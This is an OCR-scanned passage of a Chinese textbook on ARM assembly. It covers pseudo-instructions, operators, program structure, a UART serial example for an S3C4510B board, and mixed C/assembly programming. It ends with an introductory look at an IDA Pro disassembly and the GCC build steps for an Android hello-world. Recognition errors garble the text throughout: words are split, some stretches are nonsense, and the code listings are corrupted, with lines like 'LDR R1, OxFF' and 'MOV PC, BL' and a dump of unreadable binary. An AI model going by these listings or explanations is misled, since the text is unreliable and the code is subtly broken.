Temp RN R0 ; 为 RO 定义 一 个 别名 Temp 

(13) ROUT 

语法 格式 : 

{名 称 } ROUT 

ROUT 伪 指 令 用 于 给 一 个 局 部 变量 定义 作用 范围 。 在 程序 中 未 使 用 该 伪 指 令 时 , 局 部 变量 的 作用 范围 为 
所 在 的 AREA， 而 使 用 ROUT 后 ， 局 部 变量 的 作用 范围 为 当前 ROUT 和 下 一 个 ROUT 之 间 。 


164.2 汇编 语言 的 语句 格式 


ARM (Thumb) 汇编 语言 的 语句 格式 为 : 

{标号 } {指令 或 伪 指 令 } {; 注释 } 

在 汇编 语言 程序 设计 中 ， 每 一 条 指令 的 助 记 符 可 以 全 部 用 大 写 或 全 部 用 小 写 ， 但 不 允许 在 一 条 指令 中 
大 、 小 写 混用 。 同 时 ， 如 果 一 条 语句 太 长 ， 可 将 该 长 语句 分 为 若干 行 来 书写 ， 在 行 的 末尾 用 “\” 表 示 下 一 
行 与 本 行为 同一 条 语句 。 

1. 汇编 语言 程序 中 常用 的 符号 

在 汇编 语言 程序 设计 中 ， 经 常 使 用 各 种 符号 代替 地 址 、 变 量 和 常量 等 ， 以 增加 程序 的 可 读 性 。 尽 管 符 
号 的 命名 由 编程 者 决定 ， 但 也 并 不 表示 是 可 以 任意 命令 的 ， 必 须 遵循 如 下 约定 。 
符号 区 分 大 小 写 ， 同 名 的 大 、 小 写 符 号 会 被 编译 器 认为 是 两 个 不 同 的 符号 。 
符号 在 其 作用 范围 内 必须 唯一 。 

自 定义 的 符号 名 不 能 与 系统 的 保留 字 相 同 。 

符号 名 不 应 与 指令 或 伪 指令 同名 。 

程序 中 的 变量 是 指 其 值 在 程序 的 运行 过 程 中 可 以 改变 的 量 。ARM (Thumb) 汇编 程序 所 支持 的 变 
量 有 数字 变量 、 轴 辑 变 量 和 字符 串 变量 。 

> ”数字 变量 用 于 在 程序 的 运行 中 保存 数字 值 ， 但 注意 数字 值 的 大 小 不 应 超出 数字 变量 所 能 表示 

的 范围 。 
> ”逻辑 变量 用 于 在 程序 的 运行 中 保存 逻辑 值 ， 逻 辑 值 只 有 两 种 取 值 情况 : 真 或 假 。 
> 字符 串 变量 用 于 在 程序 的 运行 中 保存 一 个 字符 串 ， 但 注意 字符 串 的 长 度 不 应 超出 字符 串 变 量 

所 能 表示 的 范围 。 
> fE ARM (Thumb) 汇编 语言 程序 设计 中 ， 可 使 用 GBLA、GBLL、GBLS 伪 指 令 声明 全 局 变 

量 ， 使 用 LCLA、LCLL、LCLS 伪 指 令 声明 局 部 变量 ， 并 可 使 用 SETA、SETL 和 SETS 对 其 

进行 初始 化 。 

(1) 程序 中 的 常量 

程序 中 的 常量 是 指 其 值 在 程序 的 运行 过 程 中 不 能 被 改变 的 量 。ARM (Thumb) 汇编 程序 所 支持 的 常量 
AMS, WAS НН. 

数字 常量 一 般 为 32 位 的 整数 ， 当 作为 无 符号 数 时 ， 其 取 值 范围 为 0 一 232-1， 当 作为 有 符号 数 时 ， 其 取 
值 范围 为 -231~231-1。 逻 辑 常 量 只 有 两 种 取 值 情况 ， 真 或 假 。 

字符 串 常量 为 一 个 固定 的 字符 串 ， 一 般 用 于 程序 运行 时 的 信息 提示 。 


(m, 
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(2) 程序 中 的 变量 代 换 
程序 中 的 变量 可 通过 代 换 操作 取得 一 个 常量 。 代 换 操 作 符 为 “$”。 如 果 在 数字 变量 前 面 有 一 个 代 换 操 
作 符 “$”， 编 译 器 会 将 该 数字 变量 的 值 转换 为 十 六 进 制 的 字符 串 ， 并 将 该 十 六 进 制 的 字符 串 代 换 “$” 后 
的 数字 变量 。 
如 果 在 罗 辑 变量 前 面 有 一 个 代 换 操作 符 “$”， 编 译 器 会 将 该 逻辑 变量 代 换 为 它 的 取 值 〈 真 或 假 ) 。 


变量 


使 用 示例 : 


terssi ; 定义 局 部 字符 串 变量 S1 和 S2 
LCLS S2 

S1 SETS "Test! " 

S2 SETS "This is a $51"; 字符 串 变 量 52 的 值 为 “Thisis a Test! ” 


2. 汇编 语言 程序 中 的 表达 式 和 运算 符 


在 汇编 语言 程序 设计 中 ， 也 经 常 使 用 各 种 表达 式 ， 表 达 式 一 般 由 变量 、 常 量 、 运 算 符 和 括号 构成 。 常 
用 的 表达 式 有 数字 表达 式 、 逻 辑 表 达 式 和 字符 串 表 达 式 ， 其 运算 次 序 遵循 如 下 优先 级 规则 。 


Oooo 


d 
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优先 级 相同 的 双 目 运算 符 的 运算 顺序 为 从 左 到 右 。 
相 邻 的 单 目 运算 符 的 运算 顺序 为 从 右 到 左 ， 且 单 目 运算 符 的 优先 级 高 于 其 他 运算 符 。 
括号 运算 符 的 优先 级 最 高 。 


如 果 在 字符 串 变 量 前 面 有 一 个 代 换 操作 符 “$”， 编 译 器 会 将 该 字符 串 变量 的 值 代 换 “$” 后 的 字符 串 


数字 表达 式 及 运算 符 。 数 字 表达 式 一 般 由 数字 常量 、 数 字 变量 、 数 字 运 算 符 和 括号 构成 。 与 数字 表 


达 式 相关 的 运算 符 如 下 : 


-、x、/ 及 MOD 算术 运算 符 


以 上 算术 运算 符 分 别 代表 加 、 减 、 乘 、 除 和 取 余 数 运算 。 例 如 ， 以 X 和 Y 表 示 两 个 数字 表达 式 ， 则 : 


X+Y: 表示 X 与 Y 的 和 。 

X-Y: 表示 X 与 Y 的 差 。 

ХхҮ: 表示 X 与 Y 的 乘积 。 

X/Y: 表示 X 除 以 Y 的 商 。 

X: MOD: Y: 表示 X 除 以 Y 的 余数 。 


(1) ROL、ROR、SHL É SHR 移 位 运算 符 
以 X 和 YY 表示 两 个 数字 表达 式 ， 以 上 的 移 位 运算 符 代表 的 运算 如 下 。 
X:ROL:Y // 表 示 将 X 循环 左 移 Y 位 
X:ROR:Y // 表 示 将 X 循环 右 移 Y 位 
X:SHL:Y // 表 示 将 X 左 移 Y 位 
X:SHR:Y IRTI X BB Y 位 
(2) AND. OR, NOT 及 EOR 按 位 逻辑 运算 符 
VAX ALY 表示 两 个 数字 表达 式 ， 以 上 的 按 位 逻辑 运算 符 代表 的 运算 如 下 。 
X:AND:Y /表示 将 X F Y 按 位 作 逻辑 与 的 操作 
X:OR:Y /表示 将 X 和 Y 按 位 作 逻 辑 或 的 操作 
:NOT:Y // 表 示 将 Y 按 位 作 逻 辑 非 的 操作 
X:EOR:Y IRTI X 和 Y 按 位 作 逻 辑 异 或 的 操作 
(3) 逻辑 表达 式 及 运算 符 


关 的 运算 符 如 下 。 


=, >, <, >=, <=, /=. <> 


逻辑 量 、 逻 辑 运 算 符 和 括号 构成 ， 其 表达 式 的 运算 结果 为 真 或 假 。 与 逻辑 表达 式 相 
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以 X 和 YY 表示 两 个 逻辑 表达 式 ， 以 上 的 运算 符 代 表 的 运算 如 下 。 


X=Y WRX SFY 
XY ШК X K+ Y 
May Пт X JF Y 
XE=Y Пт X 大 于 等 于 Y 
X<=Y /表示 X 小 于 等 于 Y 
XY Пт X RSF Y 
X<>Y /表示 X 不 等 于 Y 


(4) LAND、LOR、LNOT 及 LEOR 运算 符 

UL X ALY 表示 两 个 逻辑 表达 式 ， 以 上 的 逻辑 运算 符 代 表 的 运算 如 下 。 

X:LAND:Y // 表 示 将 X FLY 作 罗 辑 与 的 操作 

X:LOR:Y IRTI X 和 YY 作 膛 辑 或 的 操作 

:LNOT:Y // 表 示 将 Y 作 远 辑 非 的 操作 

X:LEOR:Y IRTI X 和 Y 作 膛 辑 异 或 的 操作 

(5) 字符 串 表 达 式 及 运算 符 

字符 串 表 达 式 一 般 由 字符 串 常量 、 字 符 串 变 量 、 运 算 符 和 括号 构成 。 编 译 器 所 支持 的 字符 串 最 大 长 度 
为 512 字 节 ， 常 用 的 与 字符 串 表达 式 相 关 的 运算 符 如 下 。 

口 LEN 运 算 符 

LEN 运算 符 返回 字符 串 的 长 度 ( 字 符 数 ) ， 以 X 表示 字符 串 表达 式 ， 其 语法 格式 如 下 : 

:LEN:X 

口 CHR 运 算 符 

CHR 运算 符 将 0 一 255 之 间 的 整数 转换 为 一 个 字符 ， 以 M 表示 某 一 个 整数 ， 其 语法 格式 如 下 : 

:CHR:M 

口 STR 运 算 符 

STR 运算 符 将 一 个 数字 表达 式 或 逻辑 表达 式 转 换 为 一 个 字符 串 。 对 于 数字 表达 式 ，STR 运算 符 将 其 转 
换 为 一 个 以 十 六 进 制 组 成 的 字符 串 ， 对 于 逻辑 表达 式 ，STR 运算 符 将 其 转换 为 字符 串 T 或 F， 其 语法 格式 
如 下 : 

:STR:X 

其 中 ，X 为 一 个 数字 表达 式 或 逻辑 表达 式 。 

口 LEFT 运 算 符 

LEFT 运算 符 返回 某 个 字符 串 左 端的 一 个 子 串 ， 其 语法 格式 如 下 : 

X:LEFT:Y 

其 中 ，X 为 源 字 符 串 ，Y 为 一 个 整数 ， 表 示 要 返回 的 字符 个 数 。 

о RIGHT 运算 符 

与 LEFT 运算 符 相 对 应 ，RIGHT 运算 符 返回 某 个 字符 串 右 端的 一 个 子 串 ， 其 语法 格式 如 下 : 

X:RIGHT:Y 

其 中 ，X 为 源 字符 串 ，Y 为 一 个 整数 ， 表 示 要 返回 的 字符 个 数 。 

口 CC 运算 符 

CC 运算 符 用 于 将 两 个 字符 串 连 接 成 一 个 字符 串 ， 其 语法 格式 如 下 : 

X:CC:Y 

其 中 ，X 为 源 字符 串 1，Y 为 源 字符 串 2，CC 运算 符 将 Y 连接 到 X 的 后 面 。 

(6) 与 寄存 器 和 程序 计数 器 (РС) 相关 的 表达 式 及 运算 符 

常用 的 与 寄存 器 和 程序 计数 器 (PC) 相关 的 表达 式 及 运算 符 如 下 。 

口 BASE 运 算 符 


@ 
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BASE 运算 符 返 回 基于 寄存 器 的 表达 式 中 寄存 器 的 编号 ， 其 语法 格式 如 下 : 
:BASE:X 

其 中 ，X 为 与 寄存 器 相关 的 表达 式 。 

口 INDEX 运 算 符 

INDEX 运算 符 返 回 基于 寄存 器 的 表达 式 中 相对 于 其 基 址 寄存 器 的 偏 移 量 ， 其 语法 格式 如 下 : 
:INDEX:X 

其 中 ，X 为 与 寄存 器 相关 的 表达 式 。 

其 他 常用 运算 符 如 下 。 

а “?” 运 算 符 

“? ”运算 符 返 回 某 代码 行 所 生成 的 可 执行 代码 的 长 度 ， 例 如 : 

?X 

返回 定义 符号 X 的 代码 行 所 生成 的 可 执行 代码 的 字 节 数 。 

О DEF 运算 符 

DEF 运算 符 判 断 是 否定 义 某 个 符号 ， 例 如 : 

:DEF:X 

如 果 符 号 X 已 经 定义 ， 则 结果 为 真 ， 否 则 为 假 。 


16.4.3 汇编 语言 的 程序 结构 


在 ARM (Thumb) 汇编 语言 程序 中 ， 以 程序 段 为 单位 组 织 代码 。 段 是 相对 独立 的 指令 或 数据 序列 ， 具 
有 特定 的 名 称 。 段 可 以 分 为 代码 段 和 数据 段 ， 代 码 段 的 内 容 为 执行 代码 ， 数 据 段 存放 代码 运行 时 需要 用 到 
的 数据 。 一 个 汇编 程序 至 少 应 该 有 一 个 代码 段 ， 当 程序 较 长 时 ， 可 以 分 割 为 多 个 代码 段 和 数据 段 ， 多 个 段 
在 程序 编译 链接 时 最 终 形成 一 个 可 执行 的 映像 文件 。 

在 现实 应 用 中 ， 可 执行 映像 文件 通常 由 以 下 儿 部 分 构成 。 

а 一 个 或 多 个 代码 段 ， 代 码 段 的 属性 为 只 读 。 

о 0 个 或 多 个 包含 初始 化 数据 的 数据 段 ， 数 据 段 的 属性 为 可 读 写 。 

口 0 个 或 多 个 不 包含 初始 化 数据 的 数据 段 ， 数 据 段 的 属性 为 可 读 写 。 

链接 器 根据 系统 默认 或 用 户 设 定 的 规则 ， 将 各 个 段 安排 在 存储 器 中 的 相应 位 置 。 因 此 源 程序 中 段 之 间 
的 相对 位 置 与 可 执行 的 映像 文件 中 段 的 相对 位 置 一 般 不 会 相同 。 例 如 ， 下 面 是 一 个 汇编 语言 源 程 序 的 基本 
结构 。 

AREA Init, CODE, READONLY 

ENTRY 

Start 

LDR RO, -0x3FF5000 

LDR R1, OxFF 

STR R1, [RO] 

LDR RO, -0x3FF5008 

LDR R1, 0x01 

STR R1, [RO] 


END 

在 汇编 语言 程序 中 ， 用 AREA 伪 指 令 定义 一 个 段 ， 并 说 明 所 定义 段 的 相关 属性 ， 本 实例 定义 一 个 名 为 Init 
的 代码 段 ， 属 性 为 只 读 。ENTRY 伪 指 令 标识 程序 的 入 口 点 ， 接 下 来 为 指令 序列 ， 程 序 的 末尾 为 END 伪 指 令 
该 伪 指 令 告诉 编译 器 源 文件 的 结束 ， 每 一 个 汇编 程序 段 都 必须 有 一 条 END 伪 指 令 ， 指 示 代 码 段 的 结束 。 


全 
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指向 子 程序 的 入 口 点 ， 当 子 程序 执行 完毕 需要 返回 
程序 计数 器 PC 即 可 。 在 调用 子 程序 的 同时 ， 也 可 以 完成 参数 的 传递 和 从 子 程序 返回 


使 
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(1) 汇编 语言 的 子 程序 调用 


在 ARM 汇编 语言 程序 中 ， 子 程序 的 调用 一 般 是 通过 BL 指令 来 实现 的 。 在 程序 中 ， 使 用 如 下 指令 即 可 
完成 子 程序 的 调用 。 


BL 子 程序 名 


该 指令 在 执行 时 完成 如 下 操作 : 将 子 程序 的 返回 地 址 存放 在 连接 寄存 器 LR 中 ， 同 时 将 程序 计数 器 PC 


寄存 器 RO~R3 完成 。 

以 下 代码 使 用 BL 指令 调用 子 程序 的 汇编 语言 源 程序 的 基本 结构 : 
AREA Init, CODE, READONLY 
ENTRY 

Start 

LDR RO, =0x3FF5000 

LDR R1, OxFF 

STR R1, [RO] 

LDR RO, =0x3FF5008 

LDR R1, 0x01 

STR R1, [RO] 

BL PRINT_TEXT 


PRINT TEXT 
MOV PC, BL 


END 
(2) 汇编 语言 程序 示例 


以 下 是 一 个 基于 S3C4510B 的 串 行 通信 程序 ， 在 此 仅 向 读者 说 明 一 个 完整 汇编 


3 


; Institute of Automation,Chinese Academy of Sciences 
;Description: This example shows the UART communication ! 
;Date: 

UARTLCONO EQU 0x3FFD000 

UARTCONTO0 EQU 0x3FFD004 

UARTSTAT0 EQU 0x3FFD008 

UTXBUF0 EQU 0x3FFD00C 

UARTBRD0 EQU 0x3FFD014 

AREA Init,CODE,READONLY 

ENTRY 


EAEE EAE aded IAI II AISI IA SIA SI IISA 


;LED Display 
LDR R1,=0x3FF5000 
LDR R0,=&ff 
STR RO,[R1] 
LDR R1,=0x3FF5008 
LDR R0,=&ff 
STR RO,[R1] 


LISI IGS SII III IIE II II IE, 


j= 


We 


调用 处 时 ， 只 需要 将 存放 在 LR 中 的 返回 地 址 重新 复制 给 


程序 的 基本 结构 : 


第 16 章 


;UARTO line control register 
LDR R1,=UARTLCONO 
LDR R0,=0x03 

STR RO,J[R1] 


SEIS AISI SII II IIIS ASIII AID eee 


;UARTO control regiser 

LDR R1,=UARTCONTO 

LDR R0,=0x9 

STR RO,[R1] 

;UARTO baud rate divisor regiser 
;Baudrate=19200， 对 应 于 50MHz 的 系统 工作 频率 
LDR R1,=UARTBRD0 

LDR R0,=0x500 

STR RO,[R1] 


LESSIG II IOI III III IIIA OI IIIA 


;Print the messages! 
LOOP 

LDR RO,=Line1 
BL PrintLine 
LDR RO,=Line2 
BL PrintLine 
LDR RO,-Line3 
BL PrintLine 
LDR RO,-Line4 
BL PrintLine 
LDR R1,=0x7FFFFF 
LOOP1 

SUBS R1,R1,#1 
BNE LOOP1 

B LOOP 

;Print line 
PrintLine 

MOV R4,LR 
MOV R5,RO 

Line 

LDRB R1,[R5],#1 
AND RO,R1,#&FF 
TST RO#&FF 
MOVEQ PC,R4 
BL PutByte 

B Line 


PutByte 
LDR R3,-UARTSTATO 


ARM iC $8 i [9 AT 


. 
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LDR R2,[R3] 
TST R2,#840 

BEQ PutByte 

LDR R3,=UTXBUFO 
STR RO,[R3] 

MOV PC,LR 


Опет DCB Едра 

Line2 DCB &A,&D,"Chinese Academy of Sciences,Institute of Automation, Complex System Lab.",0 

Line3 DCB &A,&D," ARM Development Board Based on Samsung ARM S3C4510B.",0 

Line4 DCB 8A,8D,8A,&D,8&A,&D,8A,&D,8A,&D,8A,&D,8A,8D,8A,&D,8A,&D,8A,8D,8A,&D,8A,&D,8A,&D,8A,&D,8A, 

&D,0 

END 

(3) 汇编 语言 与 C/C++ 的 混合 编程 

在 应 用 系统 的 程序 设计 中 ， 若 所 有 的 编程 任务 均 用 汇编 语言 来 完成 ， 其 工作 量 是 可 想 而 知 的 ， 也 不 利 
于 系统 升级 或 应 用 软件 移植 ， 事 实 上 ，ARM 体系 结构 支持 C/C++ 以 及 与 汇编 语言 的 混合 编程 ， 在 一 个 完整 
的 程序 设计 中 ， 除 了 初始 化 部 分 用 汇编 语言 完成 以 外 ， 其 主要 的 编程 任务 一 般 都 用 C/C++ 完成 。 

在 现实 应 用 中 ， 汇 编 语言 与 C/C++ 的 混合 编程 通常 有 以 下 儿 种 方式 。 

O 在 C/C++ 代码 中 嵌入 汇编 指令 。 

口 在 汇编 程序 和 C/C++ 的 程序 之 间 进行 变量 的 互 访 。 

口 汇编 程序 、C/C++ 程 序 间 的 相互 调用 。 

在 以 上 的 儿 种 混合 编程 技术 中 ， 必 须 遵守 一 定 的 调用 规则 ， 如 物理 寄存 器 的 使 用 、 参 数 的 传递 等 ， 这 
对 于 初学 者 来 说 ， 无 疑 显得 过 于 烦琐 。 在 实际 的 编程 应 用 中 ， 使 用 较 多 的 方式 是 : 程序 的 初始 化 部 分 用 汇 
编 语言 完成 ， 然 后 用 C/C++ 完成 主要 的 编程 任务 ， 程 序 在 执行 时 首先 完成 初始 化 过 程 ， 然 后 跳 转 到 C/C++ 
旦 序 代码 中 ， 汇 编程 序 和 C/C++ 程序 之 间 一 般 没有 参数 的 传递 ， 也 没有 频繁 的 相互 调用 ， 因此， 整个 程序 的 
结构 显得 相对 简单 ， 容 易 理 解 。 下 面 是 一 个 这 种 结构 程序 的 基本 示例 。 


;Institute of Automation, Chinese Academy of Sciences 
;File Name: Init.s 


;Description: 

;Date: 

IMPORT Main ; 通知 编译 器 该 标号 为 一 个 外 部 标号 
AREA Init,CODE,READONLY ; 定义 一 个 代码 段 

ENTRY ; 定义 程序 的 入 口 点 

LDR R0,=0x3FF0000 ; 初始 化 系统 配置 寄存 器 

LDR R1,=0xE7FFFF80 

STR R1,[R0] 

LDR SP,=0x3FE1000 ; 初始 化 用 户 堆 栈 

BL Main ; 跳 转 到 Main() 函 数 处 的 C/C++ 代码 执行 
END ; 标识 汇编 程序 的 结束 


以 上 的 程序 段 完 成 了 一 些 简单 的 初始 化 工作 ， 然 后 跳 转 到 Main(0) 函 数 所 标识 的 C/C++ 代码 处 执行 主要 
的 任务 ， 此 处 的 Main 仅 为 一 个 标号 ， 也 可 使 用 其 他 名 称 ， 与 C 语言 程序 中 的 main() 函 数 没有 关系 。 

ааа аы 

* Institute of Automation, Chinese Academy of Sciences 

* File Name: main.c 

* Description: P0,P1 LED flash. 

* Date: 
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ккк COREE RR III III III ITE | 
void Main(void) 

{ 

int i; 

*((volatile unsigned long *) Ox3ff5000) = 0x0000000f; 

while(1) 


t 
*((volatile unsigned long *) Ox3ff5008) = 0x00000001 ; 
for(i=0; i<Ox7fFFF; i++); 
*((volatile unsigned long *) 0x3ff5008) = 0x00000002; 
for(i=0; i<Ox7FFFF; i++); 
} 


165 实战 演练 


GE 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 16 章 \ 实 战 演练 .avi 

对 于 使 用 ARM 处 理 器 的 Android 手机 来 说 , 最 终 会 生成 相应 的 ARM elf 可 执行 文件 ， 分 析 软件 的 核心 
功能 只 能 从 这 个 elf 文件 入 手 。 本 节 将 通过 一 个 具体 实例 的 实现 过 程 ， 详 细 讲解 ARM 汇编 语言 逆向 分 析 原 
生 程序 的 方法 ， 演 示 ARM 在 原生 程序 中 的 具体 作用 。 


假设 存在 一 段 如 下 所 示 的 C 代码 。 
#include <stdio.h> 


int main(int argc, char argv[ ]( 
printf("Hello ARMMI\n"); 
return 0; 


} 
将 上 述 代码 拖 入 到 IDA Pro 工具 ， 双 击 函 数 main 窗口 后 会 生成 如 下 所 示 的 ARM 原生 程序 。 


EXPORT main 1 EXPORT 表示 函数 main() 是 被 导出 来 的 
main /函数 的 名 称 

var Cz -0xc /识别 出 的 栈 变量 

var 8= -8 /识别 出 的 栈 变量 

/后 面 的 都 是 函数 main() 的 指令 部 分 

STMFD SP!,(R11,LR) // 压 入 堆栈 指令 ，STMFD 是 堆栈 寻 址 指令 
ADD R11,SP,#4 

SUB SP,SP,#8 IISUB SP,SP,#8 指令 


STR RO,[R11,#var_8] 

STR R1,[R11,#var_C] 

LDR R3,=(aHelloArm - 0x8300) 
ADD R3,PC,R3 

MOV R0,R3 

BL puts 

MOV R3,#0 

MOV RO,R3 
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SUB SP,R11,44 
/下 面 的 LDMFD 是 堆栈 寻 址 指令 
LDMFD SPL(R11,PC) //«span style="font-family: Arial, Helvetica, sans-serif;"> 堆 栈 寻 址 指令 </span> 


在 上 述 代码 中 ， 涉 及 了 多 个 ARM 指令 ， 在 本 章 前 面 的 内 容 中 已 经 讲解 了 这 些 指令 的 具体 意义 和 用 法 。 
在 Android 系统 中 , 通过 Android МОК 中 的 交叉 编译 工具 GCC 来 编译 原生 程序 。 在 Windows 或 Linux 平台 
中 通过 GCC 工具 编译 后 ， 这 些 程序 可 以 运行 在 Android 系统 中 。 

在 现实 应 用 中 ， 使 用 gee 编译 原生 C 程序 的 步骤 如 下 所 示 。 


C1) 预 处 理 
使 用 编译 器 处 理 C 程序 中 的 预 处 理 指 令 ， 例 如 : 
#include <stdio.h> 
可 以 使 用 makefile 编译 脚本 进行 编译 ， 预 处 理 后 得 到 文件 hello.i， 有 具体 代码 如 下 所 示 。 
# 1 "hello.c" 


# 1 "«built-in2" 

# 1 "<command-line>" 

# 1 "hello.c" 

# 1 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/stdio.h" 1 

# 41 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/stdio.h" 

# 1 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/sys/cdefs.h" 1 

# 59 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/sys/cdefs.h" 

# 1 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/sys/cdefs_elf.h" 1 
# 60 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/sys/cdefs.h" 2 

# 42 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/stdio.h" 2 

# 1 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/sys/_types.h" 1 

# 40 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/sys/_types.h" 

# 1 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/machine/_types.h" 1 
# 52 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/machine/_types.h" 
typedef signed char — int8 t; 

typedef unsigned char — uint8 t; 

typedef short — int16 t; 

typedef unsigned short — uint16 t; 

typedef int —int32 t; 

typedef unsigned int — uint32 t; 

typedef long long  int64 t; 


typedef unsigned long long — uint64 t; 


typedef  int8 t int least8 t; 
typedef  uint8 t — uint least8 t; 
typedef  intí6 t int least16 t; 
typedef  uintí6 t — uint least16 t; 
typedef  int32 t int least32 t; 
typedef — uint32 t — uint least32 t; 
typedef  int64 t int least64 t; 
typedef uint64 t — uint least64 t; 


typedef  int32 t int fast8 t; 
typedef  uint32 t —uint fast8 t; 
typedef  int32 t int fast16 t; 


typedef  uint32 t  uint fast16 t; 


e. 
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typedef  int32 t int fast32 t; 
typedef  uint32 t _uint fast32 t; 
typedef  int64 t int fast64 t; 
typedef uint64 t — uint fast64 t; 


typedef int —intptr t; 
typedef unsigned int — uintptr t; 


typedef  int64 t — intmax t; 
typedef  uint64 t — uintmax t; 


typedef  int32 t register t; 


typedef unsigned long — vaddr t; 
typedef unsigned long — paddr t; 
typedef unsigned long — vsize t; 
typedef unsigned long — psize t; 


typedefint clock t; 
typedef int _ clockid t; 
typedef long  ptrdiff t; 
typedefint time t; 
typedefint timer t; 


typedef _ builtin va list va list; 
typedef int___wchar_t; 


typedef int —wint t; 

typedef int rune t; 

typedef void * __wctrans_t; 

typedef void * __wctype_t; 

# 41 “c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/sys/_types.h" 2 


typedef unsigned long __ cpuid t; 
typedef  int32 t dev t; 
typedef  uint32 t  fixpt t; 
typedef  uint32 t  gid t; 


typedef  uint32 t 
typedef long — key t; 
typedef  uint32 t mode t; 
typedef  uint32 t  nlink t; 
typedef  int32 t pid t; 

Lt. rim t; 


|t sa family t; 
typedef  int32 t  segsz t; 
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typedef _uint32 t  socklen t; 
typedef  int32 t _swblk t; 
typedef  uint32 t uid t; 
typedef  uint32 t — useconds t; 
typedef  int32 t —suseconds t; 


typedef union ( 
char  mbstate8[128]; 
. int64 t  mbstateL; 
) _ mbstate t; 
# 43 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/stdio.h" 2 


# 1 "c:/android-ndk-r9/toolchains/arm-linux-androideabi-4.4.3/prebuilt/windows/bin/../lib/gcc/arm-linux-androideabi/ 
4.4.3/include/stdarg.h" 13 4 

# 40 "c/android-ndk-r9/toolchains/arm-linux-androideabi-4.4.3/prebuilt/windows/bin/../lib/gcc/arm-linux-androideabi/ 
4.4.3/include/stdarg.h" 3 4 

typedef  builtin va list  gnuc va list; 

3t 47 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/stdio.h" 2 


# 302 "c:/android-ndk-r9/platforms/android-18/arch-arm/usr/include/stdio.h" 


FILE *fdopen(int, const char *); 
int fileno(FILE *); 


int pclose(FILE *); 
FILE *popen(const char *, const char *); 


void flockfile(FILE *); 
int ftrylockfile(FILE *); 
void funlockfile(FILE *); 


int getc unlocked(FILE *); 

int getchar unlocked(void); 
int putc unlocked(int, FILE *); 
int putchar unlocked(int); 


char *tempnam(const char *, const char *); 


int asprintf(char **, const char *, ...) 
. attribute (( format  (printf, 2, 3))) 
. attribute (( nonnull (2))); 

char *fgetIn(FILE *, size t *); 

int fpurge(FILE *); 

int getw(FILE *); 

int putw(int, FILE *); 

void setbuffer(FILE *, char *, int); 

int setlinebuf(FILE *); 

int vasprintf(char **, const char *, — va list) 
. attribute (( format (printf, 2, 0))) 
. attribute (( nonnull (2))); 


@ 
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FILE *funopen(const void *, 
int (*)(void *, char *, int), 
int (*)(void *, const char *, int), 
fpos t (*)(void *, fpos_ t, int), 
int (*)(void *)); 


int srget(FILE *); 
int  swbuf(int, FILE *); 


static _ inline int — sputc(int c, FILE * р) ( 
if (-- p-> w >= 0 || ( p-> w >= p-> Ibfsize && (char) c != ^n')) 
return (* p-> р++ = c) 


else 
return (__swbuf(_c, _p)); 
} 
# 2"hello.c" 2 


int main(int argc, char* argv[ ]( 
printf("Hello ARMMI\n"); 
return 0; 
} 
(2) 编译 
使 用 GCC 编译 器 检查 代码 的 规范 性 ,确保 没有 任何 语法 错误 , 然后 使 用 ССС 编译 器 将 代码 翻译 成 ARM 
汇编 语言 代码 。 在 GCC 编译 器 中 通过 -S 选项 可 以 查看 .s 格式 的 输出 文件 。 本 实例 的 输出 文件 为 hello.s， 具 
体 代码 如 下 所 示 。 
.arch armv5te 
.fpu softvfp 
.eabi_attribute 20, 1 
.eabi_attribute 21, 1 
.eabi_attribute 23, 3 
.eabi_attribute 24, 1 
.eabi_attribute 25, 1 
.eabi_attribute 26, 2 
.eabi_attribute 30, 6 
.eabi_attribute 18, 4 
.file "hello.c" 
.Section .rodata 
.align 2 
.LCO: 
.ascii"Hello ARMM!\000" 
„text 
.align 2 
.global main 
Ауре main, %function 
main: 
@ args = 0, pretend = 0, frame = 8 
@ frame needed = 1, uses anonymous args = 0 
stmfd sp!, (fp, Ir) 
add fp, sp, #4 


LOU Android £9? € o R8 i8 sc 


Sub sp, sp, #8 
str r0, [fp, #8] 
str r1, [fp, 4-12] 
idr r3,.L3 


bl puts(PLT) 
mov r3, #0 
mov r0, r3 
sub sp, fp, #4 


Idmfd sp!, (fp, pc} 
L4: 


.align 2 
13: 
мога .LC0-(.LPIC0+8) 
.Size таіп, .-таіп 
.ident "GCC: (GNU) 4.4.3" 
.Section .note.GNU-stack,"",%progbits 
(3) 汇编 
通过 GCC 编译 器 调用 汇编 器 将 汇编 代码 转换 为 二 进 制 文件 ， 在 本 实例 中 ， 通 过 如 下 指令 可 以 生成 二 进 
制 文件 hello.o。 
gcc -c hello.s -o hello.o 
文件 hello.o 的 具体 代码 如 下 所 示 。 
Н-278? 


20 810 p. $? ? 0 EK. EE? H? Helo ARM! ОСС: (GNU) 44.3 A( aeabi г- [5ТЕ 


0119г H rka- .symtab .strtab .shstrtab .rel.text .data .bss .rodata .comment .note.GNU-stack .ARM.attr 
ibutes куз 4 8 


- D 1 
rj B*—rt 1 r +0 上 1 roO ra 1 
J SN Eno r АЛЕ, ? n Q t 
p gu r «5 рса г гл TET 
Т E Г г г =? Ет 
LL ld L| 
4 r Le 【一 lon 8 Ir +  hello.c 
$a $d main puts - 
4 4 
(4) 链接 
来 到 最 后 一 个 步骤 ， 此 时 可 以 通过 链接 器 将 上 述 二 进 制 文件 链接 成 ARM 原生 程序 ， 这 个 原生 程序 可 以 
在 Windows 中 执行 。 
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加 过 的 全 称 应 该 是 可 执行 程序 资源 压缩 ， 是 保护 文件 的 常用 手段 。 加 这 过 的 程序 可 以 直接 运行 ， 但 是 
不 能 查看 源 代码 , 要 经 过 脱 壳 才 可 以 查看 源 代码 。 在 现实 应 用 中 ，Android 应 用 程序 面临 着 巨大 的 安全 威胁 ， 
